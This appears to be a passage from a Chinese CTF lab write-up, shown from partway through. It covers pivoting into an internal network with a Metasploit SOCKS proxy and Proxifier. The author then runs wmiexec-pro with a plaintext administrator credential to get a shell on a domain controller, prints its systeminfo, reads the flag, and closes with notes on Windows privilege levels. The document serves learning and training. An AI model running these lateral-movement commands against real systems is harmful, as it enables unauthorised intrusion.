set SRVHOST 0.0.0.0
set SRVPORT 6677
set SOCKS_VERSION 5
run

回显

1
2
3
4
5
6
msf auxiliary(server/socks_proxy) > run
[*] Auxiliary module running as background job 0.

[*] Starting the SOCKS proxy server
msf auxiliary(server/socks_proxy) >

这里就是成功了
我们再回到proxifier看下

然后就开始用wmiexec
不同的版本命令也不一样
中间还有一步就是,如果你的是像我的这个PY的话,还有再搞一次代理规则
你把报错喂给AI是可以找出问题的
大概就是下面这样一个步骤

  1. Proxifier → 配置 → 代理规则 → 添加
  2. 程序名称:填你的 Python 完整路径,比如 D:\python\python.exe
  3. 目标地址:填 192.168.93.10
  4. 动作:选择你配的 SOCKS5 代理
  5. 保存,把这条规则移到最上面
    1
    python "D:\ctf\ctf-web\wmiexec\wmiexec-Pro-0.4.1\wmiexec-pro.py" administrator:zxcASDqw123!!@192.168.93.10 exec-command -shell

这里可以看到成功了

然后systeminfo试试

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
C:\Windows\system32>systeminfo
[10/07/26 01:25:41] SUCCESS Results: exec_command.py:306

Host Name: WIN-8GA56TNV3MV
OS Name: Microsoft Windows Server 2012 R2 Datacenter
OS Version: 6.3.9600 N/A Build 9600
OS Manufacturer: Microsoft Corporation
OS Configuration: Primary Domain Controller
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00253-40020-11623-AA530
Original Install Date: 10/6/2019, 7:14:32 PM
System Boot Time: 10/7/2026, 6:28:46 AM
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: AMD64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2246 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 11/12/2020
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC+08:00) Beijing, Chongqing, Hong Kong, Urumqi
Total Physical Memory: 2,047 MB
Available Physical Memory: 1,245 MB
Virtual Memory: Max Size: 2,431 MB
Virtual Memory: Available: 1,640 MB
Virtual Memory: In Use: 791 MB
Page File Location(s): C:\pagefile.sys
Domain: test.org
Logon Server: N/A
Hotfix(s): 120 Hotfix(s) Installed.
[01]: KB2894856
[02]: KB2919355
[03]: KB2919442
[04]: KB2938066
[05]: KB2938772
[06]: KB2949621
[07]: KB2954879
[08]: KB2967917
[09]: KB2977765
[10]: KB2978041
[11]: KB2978126
[12]: KB2989930
[13]: KB2999226
[14]: KB3000850
[15]: KB3003057
[16]: KB3012702
[17]: KB3013172
[18]: KB3013791
[19]: KB3014442
[20]: KB3019978
[21]: KB3023222
[22]: KB3023266
[23]: KB3024751
[24]: KB3024755
[25]: KB3030947
[26]: KB3032663
[27]: KB3033446
[28]: KB3034348
[29]: KB3035126
[30]: KB3036612
[31]: KB3037579
[32]: KB3038002
[33]: KB3042058
[34]: KB3042085
[35]: KB3043812
[36]: KB3044374
[37]: KB3044673
[38]: KB3045634
[39]: KB3045685
[40]: KB3045717
[41]: KB3045719
[42]: KB3045755
[43]: KB3045999
[44]: KB3046017
[45]: KB3046737
[46]: KB3054169
[47]: KB3054203
[48]: KB3054256
[49]: KB3054464
[50]: KB3055323
[51]: KB3055343
[52]: KB3055642
[53]: KB3059317
[54]: KB3060681
[55]: KB3060793
[56]: KB3061512
[57]: KB3063843
[58]: KB3071663
[59]: KB3071756
[60]: KB3074228
[61]: KB3074548
[62]: KB3077715
[63]: KB3078405
[64]: KB3078676
[65]: KB3080149
[66]: KB3082089
[67]: KB3084135
[68]: KB3086255
[69]: KB3087137
[70]: KB3091297
[71]: KB3094486
[72]: KB3095701
[73]: KB3097997
[74]: KB3098779
[75]: KB3099834
[76]: KB3100473
[77]: KB3103616
[78]: KB3103696
[79]: KB3103709
[80]: KB3109103
[81]: KB3109976
[82]: KB3110329
[83]: KB3115224
[84]: KB3121261
[85]: KB3123245
[86]: KB3126434
[87]: KB3126587
[88]: KB3133043
[89]: KB3133690
[90]: KB3134179
[91]: KB3134815
[92]: KB3137728
[93]: KB3138602
[94]: KB3139162
[95]: KB3139164
[96]: KB3139398
[97]: KB3139914
[98]: KB3140219
[99]: KB3140234
[100]: KB3145384
[102]: KB3146604
[103]: KB3146723
[104]: KB3146751
[105]: KB3147071
[106]: KB3149157
[107]: KB3155784
[108]: KB3156059
[109]: KB3159398
[110]: KB3161949
[111]: KB3162343
[112]: KB3172729
[113]: KB3173424
[114]: KB3175024
[115]: KB3178539
[116]: KB3179574
[117]: KB3185319
[118]: KB4033428
[119]: KB4521864
[120]: KB4520005
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) 82574L Gigabit Network Connection
Connection Name: Ethernet0
DHCP Enabled: No
IP address(es)
[01]: 192.168.93.10
[02]: fe80::e452:c45d:7bd5:feb6
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.

C:\Windows\system32>

已经拿下域控了

1
type C:\Users\Administrator\Documents\flag.txt

最后给flag加上flag{}

成功通关

最后补充,WIN权限分类

1
2
3
4
5
6
7
8
9
10
11
12
13
1. **TrustedInstaller(信任安装器)**
本机理论最高权限,是 Windows 系统核心文件、核心注册表项的默认所有者,作用是保护系统核心组件不被篡改,哪怕是 System 账户也无权修改它管辖的文件,只有系统更新、补丁安装时才会调用这个身份。
2. **NT AUTHORITY\SYSTEM(本地系统账户)**
本机实际可操作的最高权限,就是你刚才拿到的 `nt authority\system`。
- 特点:无需密码,是 Windows 内置的服务账户,拥有所有系统特权(调试进程、访问内核、修改所有本地文件)
- 比普通管理员高的地方:不受 UAC 限制,拥有更多底层特权,能访问管理员碰不了的系统深层目录
3. **Administrators 组(本地管理员组)**
日常所说的「管理员权限」,内置的 `Administrator` 账户就是这个组的默认成员。
- 权限:可以安装软件、修改系统设置、管理其他用户;但修改系统核心文件时会受权限限制,需要手动提权获取所有权
- 注意:自己新建的管理员用户,也属于这个组,权限和内置 Administrator 一致
4. **Users 组(标准用户组)**
普通用户权限,日常办公的默认等级。只能操作自己的用户目录(桌面、文档等),不能安装软件、不能修改系统配置,访问其他系统目录会被拒绝。
5. **Guests 组(来宾组)**

文章作者: wuk0Ng
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 wuk0Ng !
评论
  目录